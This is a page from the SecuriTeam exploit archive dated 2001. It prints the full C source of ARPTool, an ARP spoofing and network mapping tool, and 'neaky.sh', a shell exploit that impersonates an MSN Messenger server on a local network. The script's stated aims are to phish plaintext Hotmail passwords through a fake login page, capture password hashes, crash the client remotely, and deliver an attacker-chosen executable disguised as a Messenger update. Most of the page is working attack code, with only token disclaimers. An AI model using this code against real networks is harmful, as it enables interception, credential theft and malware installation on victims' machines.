Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Messenger and Hotmail MITM Exploit (Arptool and Neaky) 18 Jul. 2001    Summary The following is an exploit code that employs a 'Man In the Middle' attack against Messenger and its Hotmail module. The exploit code allows to: 1) Use the messenger scrambler bug to get passwords hashes. 2) Spoof a Hotmail site to retrieve plaintext passwords (since the protocol can be caused to transfer passwords in a non-encrypted form). 3) Remotely crash the client. 4) Upload a malicious program of your choice masqueraded as an update.   Credit: The information has been provided by gregory duchemin. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Prequsites: You need the arptool from Cristiano Lincoln Mattos available here: /*  * ARPTool v0.1, (c) Cristiano Lincoln Mattos, 1999 - <lincoln@hotlink.com.br>  *  * - Compiled and tested on Linux 2.0.33, 2.0.35, 2.0.36, libc5 & glibc.  * Will port to Solaris 2.5.1 as soon as i have time.  * - For usage, run it without arguments.  * - If you dont know what this is for, or what you can do with it,  * read yuri volobuev's excellent bugtraq post about ARP spoofing  * (available from the bugtraq archives).  * - The netmap results depend on the network latency.. try adjusting the  * usleep() delay, if you think it's too small/big.  * - The latest version will be always at  * http://www.hotlink.com.br/users/lincoln/arptool  * - Some code borrowed from neped (apostols.org), thanks.  *  * #include <stddisclaimer.h>  *  * CHANGELOG:  * 09/12/98 - General code cleanup.  * 07/12/98 - Removed the option for hiding in the process list, and  * double mode: didn't work as expected, stupid oversight.  * 29/12/98 - Better display of MAC's with more than one IP (proxy  * arp or virtual interfaces).  * 28/12/98 - Added check for arp reply being to source ip (netmap).  */ #include <stdio.h> #include <stdlib.h> #include <linux/if.h> #include <linux/sockios.h> #include <linux/in.h> #include <linux/if_ether.h> #include <unistd.h> #include <fcntl.h> #define ARP_ETHER 1 #define ARP_REQUEST 1 #define ARP_REPLY 2 /* Structures */ struct pkt_struct {  unsigned char eth_dst[6];  unsigned char eth_src[6];  unsigned short eth_proto;  unsigned short int arp_hw_type;  unsigned short int arp_proto;  unsigned char arp_hw_len;  unsigned char arp_proto_len; // proto is IP.  unsigned short arp_oper;  unsigned char arp_hw_src[6];  unsigned char arp_ip_src[4];  unsigned char arp_hw_dst[6];  unsigned char arp_ip_dst[4]; }; struct spoof_struct {  unsigned char hw_src[6];  unsigned char hw_dst[6];  unsigned long int ip_src;  unsigned long int ip_dst;  unsigned short op; }; /* List structures */ struct iplist_struct {  unsigned long int ip;  struct iplist_struct * next; }; struct list_struct {  unsigned char hw[ETH_ALEN];  struct iplist_struct * iplist;  struct iplist_struct * lastip;  struct list_struct * next; } * head = NULL, * tail = NULL; /* Functions */ char * hwaddr_to_str (unsigned char * str); unsigned char * str_to_hwaddr (char * str); unsigned int hexstr_to_int (char *cptr); void netmap (int fd, unsigned long int start_ip); void usage (char * av, int mode); void add_to_list (unsigned long int ip, unsigned char * hw); void show_list (); /* Global variables */ unsigned long netmask, broadcast; /* struct in_addr */ unsigned char hwaddr[ETH_ALEN]; struct sockaddr sock; int verbose = 0; void sendarp (int fd, unsigned char * h_source, unsigned char * h_dest, \      unsigned char * arp_src, unsigned char * arp_dst, \      unsigned long int ip_source, unsigned long int ip_dest, unsigned char op) {  struct pkt_struct pkt;  // Ethernet header.  memcpy(&pkt.eth_dst,h_dest,ETH_ALEN);  memcpy(&pkt.eth_src,h_source,ETH_ALEN);  pkt.eth_proto = htons(ETH_P_ARP);  // ARP header.  pkt.arp_hw_type = htons(ARP_ETHER);  pkt.arp_proto = htons(ETH_P_IP);  pkt.arp_hw_len = ETH_ALEN;  pkt.arp_proto_len = 4;  pkt.arp_oper = htons(op);  if (arp_src==0) bzero(&pkt.arp_hw_src,ETH_ALEN);   else memcpy(&pkt.arp_hw_src,arp_src,ETH_ALEN);  if (arp_dst==0) bzero(&pkt.arp_hw_dst,ETH_ALEN);   else memcpy(&pkt.arp_hw_dst,arp_dst,ETH_ALEN);  memcpy(&pkt.arp_ip_src,&ip_source,4);  memcpy(&pkt.arp_ip_dst,&ip_dest,4);  if ( (sendto(fd,&pkt,sizeof(pkt),0,&sock,sizeof(sock))) < 0) perror("Error sending ARP");  if (verbose) {   char ips[16], hws[18];   strncpy(ips,inet_ntoa(ip_source),16);   strncpy(hws,hwaddr_to_str(pkt.eth_src),18);   printf(" - Sending packet: Ether src: %s - Ether dst: %s \n",hws,hwaddr_to_str(pkt.eth_dst));   strncpy(hws,hwaddr_to_str(pkt.arp_hw_src),18);   printf(" ARP hw src: %s - ARP hw dst: %s\n",hws,hwaddr_to_str(pkt.arp_hw_dst));   printf(" ARP ip src: %s - ARP ip dst: %s - ARP op: ",ips,inet_ntoa(ip_dest));   if (op==1) printf("%s\n","Request");    else printf("%s\n","Reply");  } } void netmap (int fd, unsigned long int start_ip) {  unsigned long int ip, ip_s;  struct pkt_struct * pkt;  int i;  ip_s = start_ip;  ip = ip_s & netmask;  i = fcntl(fd,F_GETFL);  if ((fcntl(fd,F_SETFL, i | O_NONBLOCK))<0) {   perror("FCNTL"); exit (1);  }  pkt = (struct pkt_struct *) malloc(sizeof(struct pkt_struct));  bzero(pkt,sizeof(struct pkt_struct));  printf(" - Mapping network... \n");  while (ip < broadcast) {   unsigned long int iptmp;   unsigned char hwa[ETH_ALEN];   ip = ntohl(ip);   ip = htonl(++ip);   sendarp(fd,hwaddr,str_to_hwaddr("FF:FF:FF:FF:FF:FF"),hwaddr, 0,ip_s,ip,ARP_REQUEST);   usleep(1000);   i = sizeof(sock);   bzero(pkt,sizeof(struct pkt_struct));   if ((recvfrom(fd,pkt,sizeof(struct pkt_struct),0,&sock,&i)) < 0) continue;   memcpy(&iptmp,pkt->arp_ip_dst,4);   if ((iptmp!=ip_s) || (ntohs(pkt->arp_oper)!=ARP_REPLY)) continue;   memcpy(&iptmp,pkt->arp_ip_src,4);   add_to_list(iptmp,pkt->eth_src);  }  show_list();  free (pkt); }   void main (int argc, char ** argv) {  struct ifreq ifr;  struct sockaddr_in sin;  struct spoof_struct sp;  unsigned long int ip;  int fd, ret;  int i = 0, map = 0, spoof = 0, interval = 0;  char * dev;  // Parsing the arguments.  if (argc < 2) { usage(argv[0],0); exit(1); }    usage(argv[0],1);  dev = (char *) malloc(6); strncpy(dev,"eth0",5);  while ((i = getopt(argc, argv, "dc:vmi:s:")) != EOF) {   switch (i) {    case 'm': map = 1; continue;    case 'v': verbose = 1; continue;    case 'i': dev = optarg; continue;    case 'c': interval = atoi(optarg); continue;    case 's': spoof = optind-1; continue;    case '?': exit(1);    default: usage(argv[0],0); exit;   }  }  if ((map) && (spoof)) {   printf(" Error: cannot run in map mode (-m) and spoof mode (-s) simultaneously.\n");   exit(1);  }  if ((!map) && (!spoof)) {   printf(" Error: map mode (-m) or spoof mode (-s) must be specified.\n");   exit(1);  }  if (spoof) {   unsigned long int ips;   int origspoof = spoof;   spoof = optind;   if ((!argv[origspoof]) || (!argv[spoof]) || (!argv[spoof+1]) || (!argv[spoof+2]) || (!argv[spoof+3])) {    printf(" Error: spoof (-s) requires five arguments: \n");    exit(1);   }   ips = atoi(argv[spoof+3]);   if ( (ips!=1) && (ips!=2) ) {    printf(" Erro: wrong arp operation. Must be 1 for request or 2 for reply. \n");    exit(1);   }   memcpy(&sp.hw_src,str_to_hwaddr(argv[origspoof]),ETH_ALEN);   memcpy(&sp.hw_dst,str_to_hwaddr(argv[spoof++]),ETH_ALEN);   ips= inet_addr(argv[spoof++]);   memcpy(&sp.ip_src,&ips,4);   ips = inet_addr(argv[spoof++]);   memcpy(&sp.ip_dst,&ips,4);   ips = atoi(argv[spoof]);   memcpy(&sp.op,&ips,1);  }  // Setting up the sockets, interface, and getting data.  strcpy(sock.sa_data,dev);  sock.sa_family = AF_INET;  fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP));  if (fd==-1) {   perror("Socket: "); exit (1);  }  // HW Addr.  strcpy(ifr.ifr_name,dev);  ret = ioctl(fd,SIOCGIFHWADDR,&ifr);  if (ret==-1) {   perror("Error getting HW Address"); exit (1);  }  memcpy(hwaddr,ifr.ifr_hwaddr.sa_data,ETH_ALEN);  // IP.  ret = ioctl(fd,SIOCGIFADDR,&ifr);  if (ret==-1) {   perror("Error getting IP Address"); exit (1);  }  memcpy(&sin,&ifr.ifr_addr,sizeof(struct sockaddr_in));  ip = sin.sin_addr.s_addr;  // Netmask.  ret = ioctl(fd,SIOCGIFNETMASK,&ifr);  if (ret==-1) {   perror("Error getting netmask"); exit (1);  }  memcpy(&sin,&ifr.ifr_netmask,sizeof(struct sockaddr_in));  netmask = sin.sin_addr.s_addr; // netmask = 16777215; // 24 bit Netmask  // Broadcast.  ret = ioctl(fd,SIOCGIFBRDADDR,&ifr);  if (ret==-1) {   perror("Error getting broadcast"); exit (1);  }  memcpy(&sin,&ifr.ifr_broadaddr,sizeof(struct sockaddr_in));  broadcast = sin.sin_addr.s_addr;  printf(" - Hardware addr : %s\n",hwaddr_to_str(hwaddr));  printf(" - Interface IP: %s (%s)\n",inet_ntoa(ip),dev);  printf(" - Netmask: %s\n",inet_ntoa(netmask));  printf(" - Brodcast: %s\n",inet_ntoa(broadcast));  while (1) {   if (map) netmap (fd,ip);   if (spoof) {     sendarp(fd,sp.hw_src,sp.hw_dst,sp.hw_src, sp.hw_dst,sp.ip_src,sp.ip_dst,sp.op);   }   if (interval) sleep(interval);    else break;  } } char * hwaddr_to_str (unsigned char * str) {  static char tmp[20];  sprintf(tmp,"%02X:%02X:%02X:%02X:%02X:%02X",str[0],str[1], str[2],str[3],str[4],str[5]);  return tmp; } unsigned int hexstr_to_int(char *cptr) {    unsigned int i, j = 0;         while (cptr && *cptr && isxdigit(*cptr)) {       i = *cptr++ - '0';       if (9 < i) i -= 7;       j <<= 4;       j |= (i & 0x0f);    }    return(j); } unsigned char * str_to_hwaddr (char * str) {     unsigned char tmp[2], strbuf[17], t[2];     static unsigned char * buf, * tt;  int e, i;  buf = (unsigned char *) malloc(6);  bzero(t,2); bzero(tmp,2); bzero(strbuf,17); bzero(buf,6);     strncpy(strbuf,str,17); strbuf[17]='\0';     tt = buf;    e = 0;     for (i=0; i < strlen(strbuf); i++) {         if ((strbuf[i]==':') && (e==0)) continue;         tmp[e] = strbuf[i]; e++;         if (e==2) {             unsigned int a;             a = hexstr_to_int(tmp);    memcpy(tt,&a,1); tt++;             bzero(tmp,2); e = 0;         }     }  return buf; } void usage (char * av, int mode) {  printf(" ARPTool v0.1, (c) Cristiano Lincoln Mattos, 1999. <lincoln@hotlink.com.br> \n");  if (!mode) {   printf(" Sintax: %s [-i interface] [-m] [-c] [-s hwsrc hwdest ipsrc ipdst op]\n",av);   printf(" -i interface: use this interface. If ommited, default to eth0\n");   printf(" -m: network map mode. Will identify all hosts on the same \n cable segment. \n");   printf(" -s src_hwaddress dst_hwaddress src_ipaddress dst_ipaddress operation:\n");   printf(" send arbitrary ARP packets. The hardware address must be \n specified in the usual form, i.e. 00:00:FD:FF:1E:C1.\n Operation is 1 for ARP request, 2 for ARP reply. \n");   printf(" -c interval: continuous mode. Will keep sending the specified \n packets every interval seconds (requires -s or -m).\n");   exit(1);  } } void show_list () {     struct list_struct * tmp, * tmp2;     tmp = head;     while (tmp!=NULL) {   struct iplist_struct * iptmp;   iptmp = tmp->iplist;         printf(" -- HW Address: %s",hwaddr_to_str(tmp->hw));   if (iptmp->next) printf(" - Several IP's: probably router with proxy arp, or virtual interfaces.\n");   while (iptmp!=NULL) {    printf(" IP: %s\n",inet_ntoa(iptmp->ip));    iptmp = iptmp->next;   }   free(iptmp); tmp2 = tmp->next;   free(tmp); tmp = tmp2;     }  return; }         void add_to_list (unsigned long int ip, unsigned char * hw) {  struct list_struct * tmp;  struct iplist_struct * iptmp;  tmp = head;  while (tmp) {   if ((hw[0]==tmp->hw[0]) && (hw[1]==tmp->hw[1]) && (hw[2]==tmp->hw[2]) && (hw[3]==tmp->hw[3]) &&\    (hw[4]==tmp->hw[4]) && (hw[5]==tmp->hw[5])) break;   tmp = tmp->next;  }  if (!tmp) { // If it's the first HW entry, or did not find HW in list, create   if ((tmp = (struct list_struct *) malloc(sizeof(struct list_struct))) == NULL) {    printf("\n malloc error. \n"); exit (1);   }   if ((iptmp = (struct iplist_struct *) malloc(sizeof(struct iplist_struct))) == NULL) {    printf("\n malloc error. \n"); exit (1);   }   iptmp->ip = ip;   iptmp->next = NULL;   tmp->iplist = iptmp;   tmp->lastip = iptmp;   tmp->next = NULL;   memcpy(tmp->hw,hw,ETH_ALEN);   if (tail) {    tail->next = tmp;    tail = tmp;   }  } else { // Found the HW entry in the list, just add the IP.   if ((iptmp = (struct iplist_struct *) malloc(sizeof(struct iplist_struct))) == NULL) {    printf("\n malloc error. \n"); exit (1);   }   iptmp->ip = ip;   iptmp->next = NULL;   tmp->lastip->next = iptmp;   tmp->lastip = iptmp;  }  if (!head) head = tail = tmp; } Exploit code: #!/bin/sh # # // # // neaky.sh # \\ # \\ wiss army knife for Hotmail/Messenger # // # // # # # "Spoofing/brute force/misconception/unexpected input Class Attack" # # # # AUTHOR: Gregory Duchemin ( Aka c3rb3r ) # # COMPANY: NEUROCOM CANADA # 1001 bd Maisonneuve Ouest, suite 200 # H3A 3C8 Montreal (Quebec) CANADA # gdn@neurocom.com # 514 908 6800 # http://www.securite-internet.com # # DATE: January 2001 # # PURPOSE: Will spoof Hotmail/messenger server to recover user # hotmail/password, crash messenger client, remotely inject and # execute malicious exe on the victim host. # # NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY # to the limited broadcast address/IP Broadcast # otherwise u can still try it on your own gateway or from your provider ;) # As a last resort, u can temporalily modify your DNS entry for # messenger servers. # # REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly. # =============================================================== ####################################### ################################## # THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY # ###################################### ##################################   export delay=100000 ################################### # Things to be configured first ################################### # IP address of messenger server to spoof # It change from client to client, check it by sniffing or u can always # assign as many virtual ip as there are messenger server IP. export messenger="64.4.13.56" # HTTP document root export cgiroot="/usr/local/apache/cgi-bin/" export httproot="/usr/local/apache/htdocs/" # Malicious exe location export malicious_path="/tmp/" export malicious="mmssetup.exe" # Access URI : stupid garbage to hide the real url export relogin="loginid=121EAAAAFBBDC2739121+CooKie= 1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother" # Messenger PORT export PORT=1863 # real IP of our fake hotmail server, this host ip export MYIP="192.168.10.17" # number of non read messages, # need at least 1 to stimulate requests from the client export nrmsg="10" #number of non read folders export nrfld="0" #path/filename where to store hotmail password export PASSWORD_HERE="/tmp/hotmail-pass" #path to reach your arp spoofer/flooder export ARP="arptool" ########################################## # End of configuration options ########################################## handl3r() { echo echo "Job finished, hope everything is ok...." echo "see ./log for details." echo html_cleaner sync killall "$ARP" exit } usage() { echo echo -e "Usage: $0 [MODE] \n" echo echo "MODE: 1 / Hotmail web spoof for clear password recovery." echo " 2 / Hotmail weakenned MD5 password Hash recovery for bruteforce." echo " 3 / Messenger Remote CrAsh." echo " 4 / Remote injection of malicious exe." echo echo echo "NOTE: Don't forget to customize settings in the script (the first lines)." echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel." echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !" echo echo "DETAILS: attack 1/ will trojanize victim to get back a plain password." echo " attack 2/ will ask for weak md5 hash." echo " attack 3/ will crash the client.(exploitable b.overflow ?)" echo " attack 4/ will upload a fake update, naively installed." echo echo "have a nice day" echo " Gregory Duchemin ( c3rb3r@hotmail.com )" echo echo } if [ $# -lt 1 ]; then usage exit fi export MODE="$1" if [ $MODE -gt 4 ]; then usage exit fi # IP_forwarding should be set to avoid detection/suspicion. sysctl -w net.ipv4.conf.all.forwarding=1 if [ $? -eq 1 ]; then usage echo echo echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script." echo echo fi # automatic configuration of arp broadcasting/spoofing over the Lan. echo echo -n "ARP broadcast : " $ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2 2>&1 > /dev/null & if [ $? -eq 1 ]; then usage echo echo echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script." echo echo exit fi echo "OK" export TID=$! if [ $MODE = "2" ]; then echo echo "Weak MD5 hashes will be stored in /tmp/md5-password" echo echo fi if [ $MODE = "1" ]; then echo echo "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password" echo echo fi if [ $MODE = "3" ]; then echo echo "Remote client may suddenly die...." echo echo fi if [ $MODE = "4" ]; then if [ ! -f $malicious_path"/$malicious" ]; then echo echo "Please first define the trojan (in the configuration section)" echo echo exit 0 fi echo echo "Remote Injection of junky data." echo echo fi trap handl3r SIGINT function html_builder() { echo -n -e "#!/bin/sh\n cat << __MYGIFT__ Content-type:text/html\n <html> <!-- JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES --> <body> <div align=left> <div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\"> <div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\"> <form name=\"passwordform\" action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF > <table cellpadding=0 cellspacing=0 border=0 width=590> <tr> <td colspan=2> <table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td> <a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a> </td> <td align=CENTER nowrap> <img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br> <a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br> </td></tr></table> </td> </tr><tr> <td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td> <td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td> </tr> <tr><td height=6></td></tr> <tr valign=top> <td><font class=s> </font> </td> <td rowspan=4><font class=s> </font> </font> </td> </tr> <tr> <td> <font class=f size=2><b><" > $cgiroot"/$relogin" cat /tmp/.mail >> $cgiroot"/$relogin" echo -n -e "></b></font> <input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com> <table cellpadding=0 cellspacing=0> <tr> <td height=35 valign=middle><font class=sbd>Password</font> </td> <td><input type=password name=PASSWORD size=16 maxlength=16></td> <td width=22 valign=\"middle\" align=\"center\"> </td> <td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td> </tr> <tr> <td></td> <td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">Change User</a></b></font></td> </tr> </table> </form> </table> <table cellpadding=0 cellspacing=0 border=0 width=590> <tr> <td>  C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept. <a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a>   <a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement </font></a> </td> </tr> </table> </div> <p align=center> <img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 > </div> </div> </body> </html> \n__MYGIFT__\n\n">> $cgiroot"/$relogin" chmod a+x $cgiroot"/$relogin" #echo "This is the false update for messenger." > $httproot"mmssetup.exe" echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html" } html_cleaner() { rm -f $cgiroot"/$relogin" mkdir -p $httproot"$relogin" chmod a+rwx $httproot"$relogin" cp -f $malicious $httproot"$relogin""/mmssetup.exe" rm -f $httproot"response.html" } #IP ALIAS with messenger IP echo echo -n "Interface configuration : " ifconfig eth0:0 inet $messenger echo "OK" echo echo "Waiting for a client n0w...." echo # things are getting serious now, this is the messenger automate: export flag="0" cat /dev/null > ./trace while true do sync ( usleep $delay while true do export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)" if [ "$parsed" != "" ]; then sync export request=$(echo $parsed | awk '{print $1}') export num=$(echo $parsed | awk '{print $2}') case "$request" in VER) usleep $delay cat ./log | sed -e "s/VER/ver/" > ./log echo -e "VER $num MSNP5 MSNP4 CVR0\r" sync usleep $delay ;; INF) cat ./log | sed -e "s/INF/inf/" > ./log export new=$(echo $num | sed -e 's/.$/ /') echo -e "INF $new""MD5\r" usleep $delay ;; USR)        cat ./log | sed -e "s/USR/usr/" > ./log export ttype=$(echo $parsed | awk '{print $4}') if [ "$ttype" = "I" ]; then export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}') echo "$email" > /tmp/.mail html_builder rm -f /tmp/.mail if [ ! $MODE = "2" ]; then echo -e "USR $num MD5 S "$(date "+%s")"\r" else echo -e "USR $num MD5 S \r" fi else export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}') if [ $MODE = "2" ]; then echo -e "910 $num \r" usleep $delay echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password sync exit fi echo -e "USR $num OK $email $email\r" fi usleep $delay ;; SYN) export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}') cat ./log | sed -e "s/SYN/syn/" > ./log export time=$(date "+%s") echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\ n: 1.0\r\nContent-Type: text/x-msmsgspro\ file; charset=UTF-8\r\nLoginTime: $time\ \r\nEmailEnabled: 1\r\nMemberIdHigh: 84\ 224\r\nMemberIdLow: 1114357868\r\nlang_pre\ ference: 1033\r\npreferredEmail: \r\ncount\ ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\  60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \ 2AAAAAAA\ AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\ t3erLcBGzQ$$\r\n\r" usleep $delay echo -e "SYN $num $syn\r" usleep $delay sync ;; CVR) export version=$(echo $parsed | awk '{print $8}') cat ./log | sed -e "s/CVR/cvr/" > ./log        if [ "$flag" = "0" ]; then if [ $MODE = "4" ]; then echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ ttp://$MYIP\ /$relogin""/$malicious http://$MYIP/$relogin""/$malicious\ \r" else echo -e "CVR $num $version $version 1.0.0863 h\ ttp://$MYIP/\ /mmssetup.exe http://$MYIP\ /\r" fi export flag="1" else if [ "$flag" = "1" ]; then echo -e "$chg" echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\ n: 1.0\r\nContent-Type: text/x-msmsgsini\ tialemailnotification; charset=UTF-8\r\n\ \r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\ \r\nInbox-URL: /$relogin""\r\nFolders\ -URL: /$relogin""\r\nGet-URL: http\ //$MYIP\r\n\r" if [ $MODE = "4" ]; then echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ ttp://$MYIP/\ mmssetup.exe http://$MYIP/\r" else echo -e "CVR $num $version $version 1.0.0863 h\ ttp://download.microsoft.com/download/\ msnmessenger/Patch/2.1/Win98/EN-US/msg\ strst.dll http://messenger.msn.com/\r" fi export flag="3" echo -e "BPR $num C3rb3r@hotmail.com PHH\r" echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\  c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\ otmail.com MOB N\r" usleep $delay if [ $MODE = "3" ]; then echo -e "ADD 0 AL Crash Crash \r" usleep $delay exit 0 fi fi fi usleep $delay ;; CHG) export chg=$( echo "$parsed"| egrep "CHG") cat ./log | sed -e "s/CHG/chg/" > ./log usleep $delay ;; OUT) html_cleaner exit 0 ;; URL) cat ./log | sed -e "s/URL/url/" > ./log echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\ \r" usleep $delay ;; esac fi done )| nc -w 5 -s $messenger -n -l -p $PORT > ./log 2>/dev/null egrep -e 'OUT' ./log > /dev/null if [ ! $? -eq 1 ]; then echo echo "Victim has signed out...." echo "see ./log for details." echo fi done  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®